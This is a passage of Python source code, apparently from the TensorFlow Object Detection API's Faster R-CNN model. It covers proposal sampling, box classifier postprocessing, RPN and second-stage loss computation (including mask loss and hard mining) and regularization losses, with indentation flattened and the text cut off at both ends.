num_gt = tf.shape(groundtruth_classes)[0]
groundtruth_weights = tf.ones(num_gt)
groundtruth_weights_list.append(groundtruth_weights)
return (groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_masks_list, groundtruth_weights_list)
def _sample_box_classifier_minibatch_single_image(
self, proposal_boxlist, num_valid_proposals, groundtruth_boxlist,
groundtruth_classes_with_background, groundtruth_weights):
"""Samples a mini-batch of proposals to be sent to the box classifier.
Helper function for self._postprocess_rpn.
Args:
proposal_boxlist: A BoxList containing K proposal boxes in absolute
coordinates.
num_valid_proposals: Number of valid proposals in the proposal boxlist.
groundtruth_boxlist: A Boxlist containing N groundtruth object boxes in
absolute coordinates.
groundtruth_classes_with_background: A tensor with shape
`[N, self.num_classes + 1]` representing groundtruth classes. The
classes are assumed to be k-hot encoded, and include background as the
zero-th class.
groundtruth_weights: Weights attached to the groundtruth_boxes.
Returns:
a BoxList contained sampled proposals.
"""
(cls_targets, cls_weights, _, _, _) = self._detector_target_assigner.assign(
proposal_boxlist,
groundtruth_boxlist,
groundtruth_classes_with_background,
unmatched_class_label=tf.constant(
[1] + self._num_classes * [0], dtype=tf.float32),
groundtruth_weights=groundtruth_weights)
# Selects all boxes as candidates if none of them is selected according
# to cls_weights. This could happen as boxes within certain IOU ranges
# are ignored. If triggered, the selected boxes will still be ignored
# during loss computation.
cls_weights = tf.reduce_mean(cls_weights, axis=-1)
positive_indicator = tf.greater(tf.argmax(cls_targets, axis=1), 0)
valid_indicator = tf.logical_and(
tf.range(proposal_boxlist.num_boxes()) < num_valid_proposals,
cls_weights > 0
)
selected_positions = self._second_stage_sampler.subsample(
valid_indicator,
self._second_stage_batch_size,
positive_indicator)
return box_list_ops.boolean_mask(
proposal_boxlist,
selected_positions,
use_static_shapes=self._use_static_shapes,
indicator_sum=(self._second_stage_batch_size
if self._use_static_shapes else None))
def _compute_second_stage_input_feature_maps(self, features_to_crop,
proposal_boxes_normalized):
"""Crops to a set of proposals from the feature map for a batch of images.
Helper function for self._postprocess_rpn. This function calls
`tf.image.crop_and_resize` to create the feature map to be passed to the
second stage box classifier for each proposal.
Args:
features_to_crop: A float32 tensor with shape
[batch_size, height, width, depth]
proposal_boxes_normalized: A float32 tensor with shape [batch_size,
num_proposals, box_code_size] containing proposal boxes in
normalized coordinates.
Returns:
A float32 tensor with shape [K, new_height, new_width, depth].
"""
cropped_regions = self._flatten_first_two_dimensions(
self._crop_and_resize_fn(
features_to_crop, proposal_boxes_normalized,
[self._initial_crop_size, self._initial_crop_size]))
return self._maxpool_layer(cropped_regions)
def _postprocess_box_classifier(self,
refined_box_encodings,
class_predictions_with_background,
proposal_boxes,
num_proposals,
image_shapes,
mask_predictions=None):
"""Converts predictions from the second stage box classifier to detections.
Args:
refined_box_encodings: a 3-D float tensor with shape
[total_num_padded_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings. If using a shared
box across classes the shape will instead be
[total_num_padded_proposals, 1, 4]
class_predictions_with_background: a 2-D tensor float with shape
[total_num_padded_proposals, num_classes + 1] containing class
predictions (logits) for each of the proposals. Note that this tensor
*includes* background class predictions (at class index 0).
proposal_boxes: a 3-D float tensor with shape
[batch_size, self.max_num_proposals, 4] representing decoded proposal
bounding boxes in absolute coordinates.
num_proposals: a 1-D int32 tensor of shape [batch] representing the number
of proposals predicted for each image in the batch.
image_shapes: a 2-D int32 tensor containing shapes of input image in the
batch.
mask_predictions: (optional) a 4-D float tensor with shape
[total_num_padded_proposals, num_classes, mask_height, mask_width]
containing instance mask prediction logits.
Returns:
A dictionary containing:
`detection_boxes`: [batch, max_detection, 4] in normalized co-ordinates.
`detection_scores`: [batch, max_detections]
`detection_multiclass_scores`: [batch, max_detections,
num_classes_with_background] tensor with class score distribution for
post-processed detection boxes including background class if any.
`detection_anchor_indices`: [batch, max_detections] with anchor
indices.
`detection_classes`: [batch, max_detections]
`num_detections`: [batch]
`detection_masks`:
(optional) [batch, max_detections, mask_height, mask_width]. Note
that a pixel-wise sigmoid score converter is applied to the detection
masks.
`raw_detection_boxes`: [batch, total_detections, 4] tensor with decoded
detection boxes in normalized coordinates, before Non-Max Suppression.
The value total_detections is the number of second stage anchors
(i.e. the total number of boxes before NMS).
`raw_detection_scores`: [batch, total_detections,
num_classes_with_background] tensor of multi-class scores for
raw detection boxes. The value total_detections is the number of
second stage anchors (i.e. the total number of boxes before NMS).
"""
refined_box_encodings_batch = tf.reshape(
refined_box_encodings,
[-1,
self.max_num_proposals,
refined_box_encodings.shape[1],
self._box_coder.code_size])
class_predictions_with_background_batch = tf.reshape(
class_predictions_with_background,
[-1, self.max_num_proposals, self.num_classes + 1]
)
refined_decoded_boxes_batch = self._batch_decode_boxes(
refined_box_encodings_batch, proposal_boxes)
class_predictions_with_background_batch_normalized = (
self._second_stage_score_conversion_fn(
class_predictions_with_background_batch))
class_predictions_batch = tf.reshape(
tf.slice(class_predictions_with_background_batch_normalized,
[0, 0, 1], [-1, -1, -1]),
[-1, self.max_num_proposals, self.num_classes])
clip_window = self._compute_clip_window(image_shapes)
mask_predictions_batch = None
if mask_predictions is not None:
mask_height = shape_utils.get_dim_as_int(mask_predictions.shape[2])
mask_width = shape_utils.get_dim_as_int(mask_predictions.shape[3])
mask_predictions = tf.sigmoid(mask_predictions)
mask_predictions_batch = tf.reshape(
mask_predictions, [-1, self.max_num_proposals,
self.num_classes, mask_height, mask_width])
batch_size = shape_utils.combined_static_and_dynamic_shape(
refined_box_encodings_batch)[0]
batch_anchor_indices = tf.tile(
tf.expand_dims(tf.range(self.max_num_proposals), 0),
multiples=[batch_size, 1])
additional_fields = {
'multiclass_scores': class_predictions_with_background_batch_normalized,
'anchor_indices': tf.cast(batch_anchor_indices, tf.float32)
}
(nmsed_boxes, nmsed_scores, nmsed_classes, nmsed_masks,
nmsed_additional_fields, num_detections) = self._second_stage_nms_fn(
refined_decoded_boxes_batch,
class_predictions_batch,
clip_window=clip_window,
change_coordinate_frame=True,
num_valid_boxes=num_proposals,
additional_fields=additional_fields,
masks=mask_predictions_batch)
if refined_decoded_boxes_batch.shape[2] > 1:
class_ids = tf.expand_dims(
tf.argmax(class_predictions_with_background_batch[:, :, 1:], axis=2,
output_type=tf.int32),
axis=-1)
raw_detection_boxes = tf.squeeze(
tf.batch_gather(refined_decoded_boxes_batch, class_ids), axis=2)
else:
raw_detection_boxes = tf.squeeze(refined_decoded_boxes_batch, axis=2)
raw_normalized_detection_boxes = shape_utils.static_or_dynamic_map_fn(
self._normalize_and_clip_boxes,
elems=[raw_detection_boxes, image_shapes],
dtype=tf.float32)
detections = {
fields.DetectionResultFields.detection_boxes:
nmsed_boxes,
fields.DetectionResultFields.detection_scores:
nmsed_scores,
fields.DetectionResultFields.detection_classes:
nmsed_classes,
fields.DetectionResultFields.detection_multiclass_scores:
nmsed_additional_fields['multiclass_scores'],
fields.DetectionResultFields.detection_anchor_indices:
tf.cast(nmsed_additional_fields['anchor_indices'], tf.int32),
fields.DetectionResultFields.num_detections:
tf.cast(num_detections, dtype=tf.float32),
fields.DetectionResultFields.raw_detection_boxes:
raw_normalized_detection_boxes,
fields.DetectionResultFields.raw_detection_scores:
class_predictions_with_background_batch_normalized
}
if nmsed_masks is not None:
detections[fields.DetectionResultFields.detection_masks] = nmsed_masks
return detections
def _batch_decode_boxes(self, box_encodings, anchor_boxes):
"""Decodes box encodings with respect to the anchor boxes.
Args:
box_encodings: a 4-D tensor with shape
[batch_size, num_anchors, num_classes, self._box_coder.code_size]
representing box encodings.
anchor_boxes: [batch_size, num_anchors, self._box_coder.code_size]
representing decoded bounding boxes. If using a shared box across
classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
Returns:
decoded_boxes: a
[batch_size, num_anchors, num_classes, self._box_coder.code_size]
float tensor representing bounding box predictions (for each image in
batch, proposal and class). If using a shared box across classes the
shape will instead be
[batch_size, num_anchors, 1, self._box_coder.code_size].
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(
box_encodings)
num_classes = combined_shape[2]
tiled_anchor_boxes = tf.tile(
tf.expand_dims(anchor_boxes, 2), [1, 1, num_classes, 1])
tiled_anchors_boxlist = box_list.BoxList(
tf.reshape(tiled_anchor_boxes, [-1, 4]))
decoded_boxes = self._box_coder.decode(
tf.reshape(box_encodings, [-1, self._box_coder.code_size]),
tiled_anchors_boxlist)
return tf.reshape(decoded_boxes.get(),
tf.stack([combined_shape[0], combined_shape[1],
num_classes, 4]))
def _normalize_and_clip_boxes(self, boxes_and_image_shape):
"""Normalize and clip boxes."""
boxes_per_image = boxes_and_image_shape[0]
image_shape = boxes_and_image_shape[1]
boxes_contains_classes_dim = boxes_per_image.shape.ndims == 3
if boxes_contains_classes_dim:
boxes_per_image = shape_utils.flatten_first_n_dimensions(
boxes_per_image, 2)
normalized_boxes_per_image = box_list_ops.to_normalized_coordinates(
box_list.BoxList(boxes_per_image),
image_shape[0],
image_shape[1],
check_range=False).get()
normalized_boxes_per_image = box_list_ops.clip_to_window(
box_list.BoxList(normalized_boxes_per_image),
tf.constant([0.0, 0.0, 1.0, 1.0], tf.float32),
filter_nonoverlapping=False).get()
if boxes_contains_classes_dim:
max_num_proposals, num_classes, _ = (
shape_utils.combined_static_and_dynamic_shape(
boxes_and_image_shape[0]))
normalized_boxes_per_image = shape_utils.expand_first_dimension(
normalized_boxes_per_image, [max_num_proposals, num_classes])
return normalized_boxes_per_image
def loss(self, prediction_dict, true_image_shapes, scope=None):
"""Compute scalar loss tensors given prediction tensors.
If number_of_stages=1, only RPN related losses are computed (i.e.,
`rpn_localization_loss` and `rpn_objectness_loss`). Otherwise all
losses are computed.
Args:
prediction_dict: a dictionary holding prediction tensors (see the
documentation for the predict method. If number_of_stages=1, we
expect prediction_dict to contain `rpn_box_encodings`,
`rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
`image_shape`, and `anchors` fields. Otherwise we expect
prediction_dict to additionally contain `refined_box_encodings`,
`class_predictions_with_background`, `num_proposals`, and
`proposal_boxes` fields.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
scope: Optional scope name.
Returns:
a dictionary mapping loss keys (`first_stage_localization_loss`,
`first_stage_objectness_loss`, 'second_stage_localization_loss',
'second_stage_classification_loss') to scalar tensors representing
corresponding loss values.
"""
with tf.name_scope(scope, 'Loss', prediction_dict.values()):
(groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_masks_list, groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
loss_dict = self._loss_rpn(
prediction_dict['rpn_box_encodings'],
prediction_dict['rpn_objectness_predictions_with_background'],
prediction_dict['anchors'], groundtruth_boxlists,
groundtruth_classes_with_background_list, groundtruth_weights_list)
if self._number_of_stages > 1:
loss_dict.update(
self._loss_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'], groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list, prediction_dict['image_shape'],
prediction_dict.get('mask_predictions'), groundtruth_masks_list,
prediction_dict.get(
fields.DetectionResultFields.detection_boxes),
prediction_dict.get(
fields.DetectionResultFields.num_detections)))
return loss_dict
def _loss_rpn(self, rpn_box_encodings,
rpn_objectness_predictions_with_background, anchors,
groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_weights_list):
"""Computes scalar RPN loss tensors.
Uses self._proposal_target_assigner to obtain regression and classification
targets for the first stage RPN, samples a "minibatch" of anchors to
participate in the loss computation, and returns the RPN losses.
Args:
rpn_box_encodings: A 4-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted proposal box encodings.
rpn_objectness_predictions_with_background: A 2-D float tensor of shape
[batch_size, num_anchors, 2] containing objectness predictions
(logits) for each of the anchors with 0 corresponding to background
and 1 corresponding to object.
anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN. Note that `num_anchors` can differ depending
on whether the model is created in training or inference mode.
groundtruth_boxlists: A list of BoxLists containing coordinates of the
groundtruth boxes.
groundtruth_classes_with_background_list: A list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
[num_boxes] containing weights for groundtruth boxes.
Returns:
a dictionary mapping loss keys (`first_stage_localization_loss`,
`first_stage_objectness_loss`) to scalar tensors representing
corresponding loss values.
"""
with tf.name_scope('RPNLoss'):
(batch_cls_targets, batch_cls_weights, batch_reg_targets,
batch_reg_weights, _) = target_assigner.batch_assign_targets(
target_assigner=self._proposal_target_assigner,
anchors_batch=box_list.BoxList(anchors),
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=(len(groundtruth_boxlists) * [None]),
gt_weights_batch=groundtruth_weights_list)
batch_cls_weights = tf.reduce_mean(batch_cls_weights, axis=2)
batch_cls_targets = tf.squeeze(batch_cls_targets, axis=2)
def _minibatch_subsample_fn(inputs):
cls_targets, cls_weights = inputs
return self._first_stage_sampler.subsample(
tf.cast(cls_weights, tf.bool),
self._first_stage_minibatch_size, tf.cast(cls_targets, tf.bool))
batch_sampled_indices = tf.cast(shape_utils.static_or_dynamic_map_fn(
_minibatch_subsample_fn,
[batch_cls_targets, batch_cls_weights],
dtype=tf.bool,
parallel_iterations=self._parallel_iterations,
back_prop=True), dtype=tf.float32)
# Normalize by number of examples in sampled minibatch
normalizer = tf.maximum(
tf.reduce_sum(batch_sampled_indices, axis=1), 1.0)
batch_one_hot_targets = tf.one_hot(
tf.cast(batch_cls_targets, dtype=tf.int32), depth=2)
sampled_reg_indices = tf.multiply(batch_sampled_indices,
batch_reg_weights)
losses_mask = None
if self.groundtruth_has_field(fields.InputDataFields.is_annotated):
losses_mask = tf.stack(self.groundtruth_lists(
fields.InputDataFields.is_annotated))
localization_losses = self._first_stage_localization_loss(
rpn_box_encodings, batch_reg_targets, weights=sampled_reg_indices,
losses_mask=losses_mask)
objectness_losses = self._first_stage_objectness_loss(
rpn_objectness_predictions_with_background,
batch_one_hot_targets,
weights=tf.expand_dims(batch_sampled_indices, axis=-1),
losses_mask=losses_mask)
localization_loss = tf.reduce_mean(
tf.reduce_sum(localization_losses, axis=1) / normalizer)
objectness_loss = tf.reduce_mean(
tf.reduce_sum(objectness_losses, axis=1) / normalizer)
localization_loss = tf.multiply(self._first_stage_loc_loss_weight,
localization_loss,
name='localization_loss')
objectness_loss = tf.multiply(self._first_stage_obj_loss_weight,
objectness_loss, name='objectness_loss')
loss_dict = {'Loss/RPNLoss/localization_loss': localization_loss,
'Loss/RPNLoss/objectness_loss': objectness_loss}
return loss_dict
def _loss_box_classifier(self,
refined_box_encodings,
class_predictions_with_background,
proposal_boxes,
num_proposals,
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list,
image_shape,
prediction_masks=None,
groundtruth_masks_list=None,
detection_boxes=None,
num_detections=None):
"""Computes scalar box classifier loss tensors.
Uses self._detector_target_assigner to obtain regression and classification
targets for the second stage box classifier, optionally performs
hard mining, and returns losses. All losses are computed independently
for each image and then averaged across the batch.
Please note that for boxes and masks with multiple labels, the box
regression and mask prediction losses are only computed for one label.
This function assumes that the proposal boxes in the "padded" regions are
actually zero (and thus should not be matched to).
Args:
refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, box_coder.code_size] representing
predicted (final) refined box encodings. If using a shared box across
classes this will instead have shape
[total_num_proposals, 1, box_coder.code_size].
class_predictions_with_background: a 2-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors. Note that this tensor
*includes* background class predictions (at class index 0).
proposal_boxes: [batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
groundtruth_boxlists: a list of BoxLists containing coordinates of the
groundtruth boxes.
groundtruth_classes_with_background_list: a list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes + 1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
[num_boxes] containing weights for groundtruth boxes.
image_shape: a 1-D tensor of shape [4] representing the image shape.
prediction_masks: an optional 4-D tensor with shape [total_num_proposals,
num_classes, mask_height, mask_width] containing the instance masks for
each box.
groundtruth_masks_list: an optional list of 3-D tensors of shape
[num_boxes, image_height, image_width] containing the instance masks for
each of the boxes.
detection_boxes: 3-D float tensor of shape [batch,
max_total_detections, 4] containing post-processed detection boxes in
normalized co-ordinates.
num_detections: 1-D int32 tensor of shape [batch] containing number of
valid detections in `detection_boxes`.
Returns:
a dictionary mapping loss keys ('second_stage_localization_loss',
'second_stage_classification_loss') to scalar tensors representing
corresponding loss values.
Raises:
ValueError: if `predict_instance_masks` in
second_stage_mask_rcnn_box_predictor is True and
`groundtruth_masks_list` is not provided.
"""
with tf.name_scope('BoxClassifierLoss'):
paddings_indicator = self._padded_batched_proposals_indicator(
num_proposals, proposal_boxes.shape[1])
proposal_boxlists = [
box_list.BoxList(proposal_boxes_single_image)
for proposal_boxes_single_image in tf.unstack(proposal_boxes)]
batch_size = len(proposal_boxlists)
num_proposals_or_one = tf.cast(tf.expand_dims(
tf.maximum(num_proposals, tf.ones_like(num_proposals)), 1),
dtype=tf.float32)
normalizer = tf.tile(num_proposals_or_one,
[1, self.max_num_proposals]) * batch_size
(batch_cls_targets_with_background, batch_cls_weights, batch_reg_targets,
batch_reg_weights, _) = target_assigner.batch_assign_targets(
target_assigner=self._detector_target_assigner,
anchors_batch=proposal_boxlists,
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=groundtruth_classes_with_background_list,
unmatched_class_label=tf.constant(
[1] + self._num_classes * [0], dtype=tf.float32),
gt_weights_batch=groundtruth_weights_list)
class_predictions_with_background = tf.reshape(
class_predictions_with_background,
[batch_size, self.max_num_proposals, -1])
flat_cls_targets_with_background = tf.reshape(
batch_cls_targets_with_background,
[batch_size * self.max_num_proposals, -1])
one_hot_flat_cls_targets_with_background = tf.argmax(
flat_cls_targets_with_background, axis=1)
one_hot_flat_cls_targets_with_background = tf.one_hot(
one_hot_flat_cls_targets_with_background,
flat_cls_targets_with_background.get_shape()[1])
# If using a shared box across classes use directly
if refined_box_encodings.shape[1] == 1:
reshaped_refined_box_encodings = tf.reshape(
refined_box_encodings,
[batch_size, self.max_num_proposals, self._box_coder.code_size])
# For anchors with multiple labels, picks refined_location_encodings
# for just one class to avoid over-counting for regression loss and
# (optionally) mask loss.
else:
reshaped_refined_box_encodings = (
self._get_refined_encodings_for_postitive_class(
refined_box_encodings,
one_hot_flat_cls_targets_with_background, batch_size))
losses_mask = None
if self.groundtruth_has_field(fields.InputDataFields.is_annotated):
losses_mask = tf.stack(self.groundtruth_lists(
fields.InputDataFields.is_annotated))
second_stage_loc_losses = self._second_stage_localization_loss(
reshaped_refined_box_encodings,
batch_reg_targets,
weights=batch_reg_weights,
losses_mask=losses_mask) / normalizer
second_stage_cls_losses = ops.reduce_sum_trailing_dimensions(
self._second_stage_classification_loss(
class_predictions_with_background,
batch_cls_targets_with_background,
weights=batch_cls_weights,
losses_mask=losses_mask),
ndims=2) / normalizer
second_stage_loc_loss = tf.reduce_sum(
second_stage_loc_losses * tf.cast(paddings_indicator,
dtype=tf.float32))
second_stage_cls_loss = tf.reduce_sum(
second_stage_cls_losses * tf.cast(paddings_indicator,
dtype=tf.float32))
if self._hard_example_miner:
(second_stage_loc_loss, second_stage_cls_loss
) = self._unpad_proposals_and_apply_hard_mining(
proposal_boxlists, second_stage_loc_losses,
second_stage_cls_losses, num_proposals)
localization_loss = tf.multiply(self._second_stage_loc_loss_weight,
second_stage_loc_loss,
name='localization_loss')
classification_loss = tf.multiply(self._second_stage_cls_loss_weight,
second_stage_cls_loss,
name='classification_loss')
loss_dict = {'Loss/BoxClassifierLoss/localization_loss':
localization_loss,
'Loss/BoxClassifierLoss/classification_loss':
classification_loss}
second_stage_mask_loss = None
if prediction_masks is not None:
if groundtruth_masks_list is None:
raise ValueError('Groundtruth instance masks not provided. '
'Please configure input reader.')
if not self._is_training:
(proposal_boxes, proposal_boxlists, paddings_indicator,
one_hot_flat_cls_targets_with_background
) = self._get_mask_proposal_boxes_and_classes(
detection_boxes, num_detections, image_shape,
groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_weights_list)
unmatched_mask_label = tf.zeros(image_shape[1:3], dtype=tf.float32)
(batch_mask_targets, _, _, batch_mask_target_weights,
_) = target_assigner.batch_assign_targets(
target_assigner=self._detector_target_assigner,
anchors_batch=proposal_boxlists,
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=groundtruth_masks_list,
unmatched_class_label=unmatched_mask_label,
gt_weights_batch=groundtruth_weights_list)
# Pad the prediction_masks with to add zeros for background class to be
# consistent with class predictions.
if prediction_masks.get_shape().as_list()[1] == 1:
# Class agnostic masks or masks for one-class prediction. Logic for
# both cases is the same since background predictions are ignored
# through the batch_mask_target_weights.
prediction_masks_masked_by_class_targets = prediction_masks
else:
prediction_masks_with_background = tf.pad(
prediction_masks, [[0, 0], [1, 0], [0, 0], [0, 0]])
prediction_masks_masked_by_class_targets = tf.boolean_mask(
prediction_masks_with_background,
tf.greater(one_hot_flat_cls_targets_with_background, 0))
mask_height = shape_utils.get_dim_as_int(prediction_masks.shape[2])
mask_width = shape_utils.get_dim_as_int(prediction_masks.shape[3])
reshaped_prediction_masks = tf.reshape(
prediction_masks_masked_by_class_targets,
[batch_size, -1, mask_height * mask_width])
batch_mask_targets_shape = tf.shape(batch_mask_targets)
flat_gt_masks = tf.reshape(batch_mask_targets,
[-1, batch_mask_targets_shape[2],
batch_mask_targets_shape[3]])
# Use normalized proposals to crop mask targets from image masks.
flat_normalized_proposals = box_list_ops.to_normalized_coordinates(
box_list.BoxList(tf.reshape(proposal_boxes, [-1, 4])),
image_shape[1], image_shape[2], check_range=False).get()
flat_cropped_gt_mask = self._crop_and_resize_fn(
tf.expand_dims(flat_gt_masks, -1),
tf.expand_dims(flat_normalized_proposals, axis=1),
[mask_height, mask_width])
# Without stopping gradients into cropped groundtruth masks the
# performance with 100-padded groundtruth masks when batch size > 1 is
# about 4% worse.
# TODO(rathodv): Investigate this since we don't expect any variables
# upstream of flat_cropped_gt_mask.
flat_cropped_gt_mask = tf.stop_gradient(flat_cropped_gt_mask)
batch_cropped_gt_mask = tf.reshape(
flat_cropped_gt_mask,
[batch_size, -1, mask_height * mask_width])
mask_losses_weights = (
batch_mask_target_weights * tf.cast(paddings_indicator,
dtype=tf.float32))
mask_losses = self._second_stage_mask_loss(
reshaped_prediction_masks,
batch_cropped_gt_mask,
weights=tf.expand_dims(mask_losses_weights, axis=-1),
losses_mask=losses_mask)
total_mask_loss = tf.reduce_sum(mask_losses)
normalizer = tf.maximum(
tf.reduce_sum(mask_losses_weights * mask_height * mask_width), 1.0)
second_stage_mask_loss = total_mask_loss / normalizer
if second_stage_mask_loss is not None:
mask_loss = tf.multiply(self._second_stage_mask_loss_weight,
second_stage_mask_loss, name='mask_loss')
loss_dict[mask_loss.op.name] = mask_loss
return loss_dict
def _get_mask_proposal_boxes_and_classes(
self, detection_boxes, num_detections, image_shape, groundtruth_boxlists,
groundtruth_classes_with_background_list, groundtruth_weights_list):
"""Returns proposal boxes and class targets to compute evaluation mask loss.
During evaluation, detection boxes are used to extract features for mask
prediction. Therefore, to compute mask loss during evaluation detection
boxes must be used to compute correct class and mask targets. This function
returns boxes and classes in the correct format for computing mask targets
during evaluation.
Args:
detection_boxes: A 3-D float tensor of shape [batch, max_detection_boxes,
4] containing detection boxes in normalized co-ordinates.
num_detections: A 1-D float tensor of shape [batch] containing number of
valid boxes in `detection_boxes`.
image_shape: A 1-D tensor of shape [4] containing image tensor shape.
groundtruth_boxlists: A list of groundtruth boxlists.
groundtruth_classes_with_background_list: A list of groundtruth classes.
groundtruth_weights_list: A list of groundtruth weights.
Return:
mask_proposal_boxes: detection boxes to use for mask proposals in absolute
co-ordinates.
mask_proposal_boxlists: `mask_proposal_boxes` in a list of BoxLists in
absolute co-ordinates.
mask_proposal_paddings_indicator: a tensor indicating valid boxes.
mask_proposal_one_hot_flat_cls_targets_with_background: Class targets
computed using detection boxes.
"""
batch, max_num_detections, _ = detection_boxes.shape.as_list()
proposal_boxes = tf.reshape(box_list_ops.to_absolute_coordinates(
box_list.BoxList(tf.reshape(detection_boxes, [-1, 4])), image_shape[1],
image_shape[2]).get(), [batch, max_num_detections, 4])
proposal_boxlists = [
box_list.BoxList(detection_boxes_single_image)
for detection_boxes_single_image in tf.unstack(proposal_boxes)
]
paddings_indicator = self._padded_batched_proposals_indicator(
tf.cast(num_detections, dtype=tf.int32), detection_boxes.shape[1])
(batch_cls_targets_with_background, _, _, _,
_) = target_assigner.batch_assign_targets(
target_assigner=self._detector_target_assigner,
anchors_batch=proposal_boxlists,
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=groundtruth_classes_with_background_list,
unmatched_class_label=tf.constant(
[1] + self._num_classes * [0], dtype=tf.float32),
gt_weights_batch=groundtruth_weights_list)
flat_cls_targets_with_background = tf.reshape(
batch_cls_targets_with_background, [-1, self._num_classes + 1])
one_hot_flat_cls_targets_with_background = tf.argmax(
flat_cls_targets_with_background, axis=1)
one_hot_flat_cls_targets_with_background = tf.one_hot(
one_hot_flat_cls_targets_with_background,
flat_cls_targets_with_background.get_shape()[1])
return (proposal_boxes, proposal_boxlists, paddings_indicator,
one_hot_flat_cls_targets_with_background)
def _get_refined_encodings_for_postitive_class(
self, refined_box_encodings, flat_cls_targets_with_background,
batch_size):
# We only predict refined location encodings for the non background
# classes, but we now pad it to make it compatible with the class
# predictions
refined_box_encodings_with_background = tf.pad(refined_box_encodings,
[[0, 0], [1, 0], [0, 0]])
refined_box_encodings_masked_by_class_targets = (
box_list_ops.boolean_mask(
box_list.BoxList(
tf.reshape(refined_box_encodings_with_background,
[-1, self._box_coder.code_size])),
tf.reshape(tf.greater(flat_cls_targets_with_background, 0), [-1]),
use_static_shapes=self._use_static_shapes,
indicator_sum=batch_size * self.max_num_proposals
if self._use_static_shapes else None).get())
return tf.reshape(
refined_box_encodings_masked_by_class_targets, [
batch_size, self.max_num_proposals,
self._box_coder.code_size
])
def _padded_batched_proposals_indicator(self,
num_proposals,
max_num_proposals):
"""Creates indicator matrix of non-pad elements of padded batch proposals.
Args:
num_proposals: Tensor of type tf.int32 with shape [batch_size].
max_num_proposals: Maximum number of proposals per image (integer).
Returns:
A Tensor of type tf.bool with shape [batch_size, max_num_proposals].
"""
batch_size = tf.size(num_proposals)
tiled_num_proposals = tf.tile(
tf.expand_dims(num_proposals, 1), [1, max_num_proposals])
tiled_proposal_index = tf.tile(
tf.expand_dims(tf.range(max_num_proposals), 0), [batch_size, 1])
return tf.greater(tiled_num_proposals, tiled_proposal_index)
def _unpad_proposals_and_apply_hard_mining(self,
proposal_boxlists,
second_stage_loc_losses,
second_stage_cls_losses,
num_proposals):
"""Unpads proposals and applies hard mining.
Args:
proposal_boxlists: A list of `batch_size` BoxLists each representing
`self.max_num_proposals` representing decoded proposal bounding boxes
for each image.
second_stage_loc_losses: A Tensor of type `float32`. A tensor of shape
`[batch_size, self.max_num_proposals]` representing per-anchor
second stage localization loss values.
second_stage_cls_losses: A Tensor of type `float32`. A tensor of shape
`[batch_size, self.max_num_proposals]` representing per-anchor
second stage classification loss values.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
Returns:
second_stage_loc_loss: A scalar float32 tensor representing the second
stage localization loss.
second_stage_cls_loss: A scalar float32 tensor representing the second
stage classification loss.
"""
for (proposal_boxlist, single_image_loc_loss, single_image_cls_loss,
single_image_num_proposals) in zip(
proposal_boxlists,
tf.unstack(second_stage_loc_losses),
tf.unstack(second_stage_cls_losses),
tf.unstack(num_proposals)):
proposal_boxlist = box_list.BoxList(
tf.slice(proposal_boxlist.get(),
[0, 0], [single_image_num_proposals, -1]))
single_image_loc_loss = tf.slice(single_image_loc_loss,
[0], [single_image_num_proposals])
single_image_cls_loss = tf.slice(single_image_cls_loss,
[0], [single_image_num_proposals])
return self._hard_example_miner(
location_losses=tf.expand_dims(single_image_loc_loss, 0),
cls_losses=tf.expand_dims(single_image_cls_loss, 0),
decoded_boxlist_list=[proposal_boxlist])
def regularization_losses(self):
"""Returns a list of regularization losses for this model.
Returns a list of regularization losses for this model that the estimator
needs to use during training/optimization.
Returns:
A list of regularization loss tensors.
"""
all_losses = []
slim_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
# Copy the slim losses to avoid modifying the collection
if slim_losses:
all_losses.extend(slim_losses)
# TODO(kaftan): Possibly raise an error if the feature extractors are
# uninitialized in Keras.
if self._feature_extractor_for_proposal_features:
if (self._feature_extractor_for_proposal_features !=
_UNINITIALIZED_FEATURE_EXTRACTOR):
all_losses.extend(self._feature_extractor_for_proposal_features.losses)
if isinstance(self._first_stage_box_predictor_first_conv,
tf.keras.Model):
all_losses.extend(
self._first_stage_box_predictor_first_conv.losses)
if self._first_stage_box_predictor.is_keras_model:
all_losses.extend(self._first_stage_box_predictor.losses)
if self._feature_extractor_for_box_classifier_features:
if (self._feature_extractor_for_box_classifier_features !=
_UNINITIALIZED_FEATURE_EXTRACTOR):
all_losses.extend(
self._feature_extractor_for_box_classifier_features.losses)
if self._mask_rcnn_box_predictor:
if self._mask_rcnn_box_predictor.is_keras_model:
all_losses.extend(self._mask_rcnn_box_predictor.losses)
return all_losses
def restore_map(self,
